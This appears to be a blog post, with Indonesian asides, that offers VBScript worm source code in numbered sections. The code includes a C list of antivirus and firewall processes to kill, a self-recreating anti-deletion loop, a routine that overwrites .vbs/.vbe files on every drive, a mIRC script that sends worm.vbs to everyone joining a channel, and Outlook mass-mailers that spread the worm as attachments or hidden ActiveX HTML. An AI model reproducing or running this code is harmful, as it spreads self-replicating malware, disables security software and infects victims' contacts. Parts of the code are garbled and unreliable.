#include
#include
#include
#include
#pragma argsused
const char *kill_av[]={ "AGENTSVR.EXE", "ANTI-TROJAN.EXE", "ANTIVIRUS.EXE", "ANTS.EXE",
"APIMONITOR.EXE", "APLICA32.EXE", "APVXDWIN.EXE", "ATCON.EXE",
"ATGUARD.EXE", "ATRO55EN.EXE", "ATUPDATER.EXE", "ATWATCH.EXE",
"AUPDATE.EXE", "AUTODOWN.EXE", "AUTOTRACE.EXE", "AUTOUPDATE.EXE",
"AVCONSOL.EXE", "AVGSERV9.EXE", "AVLTMAIN.EXE", "AVPUPD.EXE",
"AVSYNMGR.EXE", "AVWUPD32.EXE", "AVXQUAR.EXE", "AVprotect9x.exe",
"Au.exe", "BD_PROFESSIONAL.EXE", "BIDEF.EXE", "BIDSERVER.EXE",
"BIPCP.EXE", "BIPCPEVALSETUP.EXE", "BISP.EXE", "BLACKD.EXE",
"BLACKICE.EXE", "BOOTWARN.EXE", "BORG2.EXE", "BS120.EXE",
"CCAPP.exe", "CDP.EXE", "CFGWIZ.EXE", "CFIADMIN.EXE", "CFIAUDIT.EXE",
"CFINET.EXE", "CFINET32.EXE", "CLEAN.EXE", "CLEANER.EXE", "CLEANER3.EXE",
"CLEANPC.EXE", "CMGRDIAN.EXE", "CMON016.EXE", "CPD.EXE", "CPF9X206.EXE",
"CPFNT206.EXE", "CV.EXE", "CWNB181.EXE", "CWNTDWMO.EXE", "D3dupdate.exe",
"DEFWATCH.EXE", "DEPUTY.EXE", "DPF.EXE", "DPFSETUP.EXE", "DRWATSON.EXE",
"DRWEBUPW.EXE", "ENT.EXE", "ESCANH95.EXE", "ESCANHNT.EXE",
"ESCANV95.EXE", "EXANTIVIRUS-CNET.EXE", "FAST.EXE", "FIREWALL.EXE",
"FLOWPROTECTOR.EXE", "FP-WIN_TRIAL.EXE", "FRW.EXE", "FSAV.EXE",
"FSAV530STBYB.EXE", "FSAV530WTBYB.EXE", "FSAV95.EXE", "GBMENU.EXE",
"GBPOLL.EXE", "GUARD.EXE", "HACKTRACERSETUP.EXE", "HTLOG.EXE",
"HWPE.EXE", "IAMAPP.EXE", "IAMSERV.EXE", "ICLOAD95.EXE",
"ICLOADNT.EXE", "ICMON.EXE", "ICSSUPPNT.EXE", "ICSUPP95.EXE",
"ICSUPPNT.EXE", "IFW2000.EXE", "IPARMOR.EXE", "IRIS.EXE",
"JAMMER.EXE", "KAVLITE40ENG.EXE", "KAVPERS40ENG.EXE",
"KERIO-PF-213-EN-WIN.EXE", "KERIO-WRL-421-EN-WIN.EXE",
"KERIO-WRP-421-EN-WIN.EXE", "KILLPROCESSSETUP161.EXE",
"LDPRO.EXE", "LOCALNET.EXE", "LOCKDOWN.EXE", "LOCKDOWN2000.EXE",
"LSETUP.EXE", "LUALL.EXE", "LUCOMSERVER.EXE", "LUINIT.EXE",
"MCAGENT.EXE", "MCUPDATE.EXE", "MFW2EN.EXE", "MFWENG3.02D30.EXE",
"MGUI.EXE", "msconfig.exe", "MINILOG.EXE", "MOOLIVE.EXE", "MRFLUX.EXE",
"MSCONFIG.EXE", "MSINFO32.EXE", "MSSMMC32.EXE", "MU0311AD.EXE",
"NAV80TRY.EXE", "NAVAPW32.EXE", "NAVDX.EXE", "NAVSTUB.EXE",
"NAVW32.EXE", "NC2000.EXE", "NCINST4.EXE", "NDD32.EXE",
"NEOMONITOR.EXE", "NETARMOR.EXE", "NETINFO.EXE", "NETMON.EXE",
"NETSCANPRO.EXE", "NETSPYHUNTER-1.2.EXE", "NETSTAT.EXE",
"NISSERV.EXE", "NISUM.EXE", "NMAIN.EXE", "NORTON_INTERNET_SECU_3.0_407.EXE",
"NPF40_TW_98_NT_ME_2K.EXE", "NPFMESSENGER.EXE", "NPROTECT.EXE",
"NSCHED32.EXE", "NTVDM.EXE", "NUPGRADE.EXE", "NVARCH16.EXE",
"NWINST4.EXE", "NWTOOL16.EXE", "OSTRONET.EXE", "OUTPOST.EXE",
"OUTPOSTINSTALL.EXE", "OUTPOSTPROINSTALL.EXE", "PADMIN.EXE",
"PANIXK.EXE", "PAVPROXY.EXE", "PCC2002S902.EXE", "PCC2K_76_1436.EXE",
"PCCIOMON.EXE", "PCDSETUP.EXE", "PCFWALLICON.EXE", "PCIP10117_0.EXE",
"PDSETUP.EXE", "PERISCOPE.EXE", "PERSFW.EXE", "PF2.EXE", "PFWADMIN.EXE",
"PINGSCAN.EXE", "PLATIN.EXE", "POPROXY.EXE", "POPSCAN.EXE", "PORTDETECTIVE.EXE",
"PPINUPDT.EXE", "PPTBC.EXE", "PPVSTOP.EXE", "PROCEXPLORERV1.0.EXE",
"PROPORT.EXE", "PROTECTX.EXE", "PSPF.EXE", "PURGE.EXE", "PVIEW95.EXE",
"QCONSOLE.EXE", "QSERVER.EXE", "RAV8WIN32ENG.EXE", "RESCUE.EXE",
"RESCUE32.EXE", "RRGUARD.EXE", "RSHELL.EXE", "RTVSCN95.EXE",
"RULAUNCH.EXE", "SAFEWEB.EXE", "SBSERV.EXE", "SD.EXE", "SETUPVAMEEVAL.EXE",
"SETUP_FLOWPROTECTOR_US.EXE", "SFC.EXE", "SGSSFW32.EXE",
"avserve2.exe", "SHELLSPYINSTALL.EXE", "SHN.EXE", "SMC.EXE",
"SOFI.EXE", "SPF.EXE", "SPHINX.EXE", "SPYXX.EXE", "SS3EDIT.EXE",
"ST2.EXE", "SUPFTRL.EXE", "SUPPORTER5.EXE", "SYMPROXYSVC.EXE",
"SYSEDIT.EXE", "TASKMGR", "TASKMON.EXE", "TAUMON.EXE", "TAUSCAN.EXE",
"TC.EXE", "TCA.EXE", "TCM.EXE", "TDS-3.EXE", "TDS2-98.EXE",
"TDS2-NT.EXE", "TFAK5.EXE", "TGBOB.EXE", "TITANIN.EXE",
"TITANINXP.EXE", "TRACERT.EXE", "TRJSCAN.EXE", "TRJSETUP.EXE",
"TROJANTRAP3.EXE", "UNDOBOOT.EXE", "UPDATE.EXE", "VBCMSERV.EXE",
"VBCONS.EXE", "VBUST.EXE", "VBWIN9X.EXE", "VBWINNTW.EXE",
"VCSETUP.EXE", "VFSETUP.EXE", "VIRUSMDPERSONALFIREWALL.EXE",
"VNLAN300.EXE", "VNPC3000.EXE", "VPC42.EXE", "VPFW30S.EXE",
"VPTRAY.EXE", "VSCENU6.02D30.EXE", "VSECOMR.EXE", "VSHWIN32.EXE",
"VSISETUP.EXE", "VSMAIN.EXE", "VSMON.EXE", "VSSTAT.EXE",
"VSWIN9XE.EXE", "VSWINNTSE.EXE", "VSWINPERSE.EXE",
"W32DSM89.EXE", "W9X.EXE", "WATCHDOG.EXE", "WEBSCANX.EXE",
"WGFE95.EXE", "WHOSWATCHINGME.EXE", "WINRECON.EXE",
"WNT.EXE", "WRADMIN.EXE", "WRCTRL.EXE", "WSBGATE.EXE",
"WYVERNWORKSFIREWALL.EXE", "XPF202EN.EXE", "ZAPRO.EXE",
"ZAPSETUP3001.EXE", "ZATUTOR.EXE", "ZAUINST.EXE", "ZONALM2601.EXE",
"ZONEALARM.EXE","zlclient.exe", "lexplore.exe", "Drunk_lol.pif",
"Webcam_004.pif", 0};
const char *drives[] = {"a:", "b:", "c:", "d:", "e:", "f:", "g:", "h:", "i:", "j:", "k:", "l:",
"m:", "n:", "o:", "p:", "q:", "r:", "s:", "t:", "u:", "v:", "w:", "x:",
"y:", "z:", 0};
1. Anti Delletion
This function must be the last one called, cause it never ends.
If it detects that the file has been deleted, it creates it again.
Code:
Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function
2. Infectefiles
These two funtions will search in all the HD for mirc.ini, Pirch32.exe,
vbs and vbe files. When its found any of them it calls the infection function.
Code:
Function Dodrives()
On Error Resume Next
Set fso = CreateObject("scipting.filesystemobject")
Set Drives = fso.Drives
For Each Drive In Drives
If Drive.Drivetype = Remote Then
Drivefull = Drive & ""
Call Subfolders(Drivefull)
ElseIf Drive.IsReady Then
Drivefull = Drive & ""
Call Subfolders(Drivefull)
End If
Next
End Function
Function Subfolders(path)
newpath=path
Set Fold = fso.GetFolder(newpath)
Set Files = Fold.Files
For Each file In Files
If fso.GetExtensionName(file.path) = "vbs" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If fso.GetExtensionName(file.path) = "vbe" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If file.Name = "mirc.ini" Then
Mirc (file.ParentFolder)
End If
If file.Name = "Pirch32.exe" Then
Pirch (file.ParentFolder)
End If
Next
Set file = Fold.Subfolders
For Each Subfol In file
Call Subfolders(Subfol.path)
Next
End Function
[/code]
3. Mirc Txt
This function will infect mirc whit a simple script
Quote:
Function Mirc(Path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If Path = "" Then
If fso.fileexists("c:mircmirc.ini") Then Path = "c:mirc"
If fso.fileexists("c:mirc32mirc.ini") Then Path = "c:mirc32"
PfDir = ws.regread("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir")
If fso.fileexists(PfDir & "mircmirc.ini") Then Path = PfDir & "mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick c:windowsworm.vbs"
Script.writeline "n3=}"
Script.Close
End If
End Function
4. Outlook Attached
Code:
Function Outlook()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set Mapi = OutlookApp.GetNameSpace("MAPI")
set mapiadlist as Mapi.AddressLists
For Each Addresslist In mapiadlist
If Addresslist.AddressEntries.Count <> 0 Then
Addresslistcout = Addresslist.AddressEntries.Count
For AddList = 1 To Addresslistcout
Set msg = OutlookApp.CreateItem(0)
Set AdEntries = Addresslist.AddressEntries(AddList)
msg.To = AdEntries.Address
msg.Subject = "Here you have, ;o)"
msg.Body = "Hi:" & vbCrLf & "Check This!"
set Attachs=msg.Attachments
Attachs.Add "c:windowworm.vbs"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End If
End Function
5. OutlookBody
Code:
Function OutlookBody()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34)
& "&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<" & "HTML><" & "HEAD><" & "META content=" & Chr(34) & " & chr(34) & " &
Chr(34) & "text/html; charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><"
& "META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><"
& "STYLE><" & "BODY bgColor=#ffffff><" & "SCRIPT
language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "scripting.filesystemobject"
& Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "
size='2'>You need ActiveX enabled if you want to see this e-mail.
Please open
this message again and click accept ActiveX
Microsoft Outlook" & Chr(34)
& ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.createtextfile(fso.getspecialfolder(0) & " &
Chr(34) & "Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34)
& ")"
htm = htm & vbCrLf & "ws.run fso.getspecialfolder(0) & " & Chr(34) & "wscript.exe
" & Chr(34) & " & fso.getspecialfolder(0) & " & Chr(34) & "Worm.vbs %" & Chr(34)
& ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent
errors.
Sorry
" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
Set Mapiadd=mapi.AddressLists
For Each Addresslist In Mapiadd
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Rv: 4You"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Outlook.Quit
End If
End Function
Jangan di pakai cembarangan eA..xixiixi!! (Bersambung)
dim fso, myself,mytext
set fso = createobject("scripting.filesystemobject")
set myself = fso.opentextfile(wscript.scriptfullname)
mytext = myself.readall
myself.close
do
if fso.fileexists(wscript.scriptfullname) = false then
set myself = fso.createtextfile(wscript.scriptfullname)
myself.write mytext
myself.close
end if
loop
Tidak ada komentar:
Posting Komentar